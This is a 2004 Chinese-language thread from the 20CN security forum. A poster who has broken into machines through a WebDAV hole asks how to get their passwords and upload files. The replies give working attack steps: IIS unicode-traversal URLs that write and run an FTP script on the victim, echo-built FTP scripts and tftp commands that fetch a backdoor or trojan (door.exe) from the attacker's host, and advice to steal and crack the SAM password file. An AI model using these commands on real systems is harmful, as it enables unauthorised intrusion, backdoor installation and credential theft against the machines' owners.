|
 | 作者: piaoyi216 [piaoyi216]
 论坛用户 |
登录 |
| 用webdav扫描出有漏洞的机器后,WEBDAVX3 目标IP 80 0,后TELNET IP 7788,到达对方机器。 1.怎样找到对方用户名及密码。 2.怎样上传文件,如果用FTP 好象死机。如用TFTP 怎么用法,请高手详细指点。 |
| 地主 发表时间: 04-02-21 13:01 |
 | 回复: ma2751_cn [ma2751_cn]  |
登录 |
|
在自己的电脑上(拥有公网IP)上用20CN的FTP服务软件开个FTP, 然后...... 还记得unicode漏洞吗? 温习一下: http://目标服务器IP/scripts/system.exe?/c+echo+open+自己的FTP地址>hack.bat http://目标服务器IP/scripts/system.exe?/c+echo+FTP用户名>>hack.bat http://目标服务器IP/scripts/system.exe?/c+echo+FTP密码>>hack.bat http://目标服务器IP/scripts/system.exe?/c+echo+bin>>hack.bat http://目标服务器IP/scripts/system.exe?/c+echo+get+要传到目标机器的文件>>hack.bat http://目标服务器IP/scripts/system.exe?/c+echo+quit>>hack.bat http://目标服务器IP/scripts/system.exe?/c+ftp+-s:hack.bat OK,明白了吗? 晕,还不知道啊!简化一下命令(详看FTP命令) open FTPServer user pass bin get files quit 想办法用命令把上面的上面的字符写到一个文本文件去,然后再用FTP客户端来运行你所存的文件。OK~~~ |
| B1层 发表时间: 04-02-21 15:01 |
 | 回复: cyshaoping [cyshaoping]  论坛用户 |
登录 |
|
tftp -i \\你的ip get *.* 好象是这样的,很久没用了,忘了 |
| B2层 发表时间: 04-02-22 07:41 |
 | 回复: chiru [chiru] 论坛用户 |
登录 |
|
如果用ftp的话,得到shell后用以下管道命令建立一个文本文件ppp.txt echo open ×××。×××。××× 端口 >>ppp.txt echo 用户名 >>ppp.txt echo 密码 >>ppp.txt echo binary >>ppp.txt echo get 后门程序 >>ppp.txt echo bye >>ppp.txt 其中,×××。×××。×××。××× 是你的ftp空间或你本机(有ftp服务器)的IP地址,端口就是你自定端口。后门程序就是你已经传送FTP空间或你自己本机准备好的后门或木马。 然后再用如下命令: ftp -s:ppp.txt 如果是用tftp命令如下:tftp -i ***.***.***.*** get door.exe 这个不用解释了吧。 要直接获取用户名和密码是很难的。抓.sam文件回来破喽。或直接传个可以看密码的远程控制软件过去喽。20cn的远程控制软件就有这功能。 |
| B3层 发表时间: 04-02-22 10:11 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: webadv问题?????????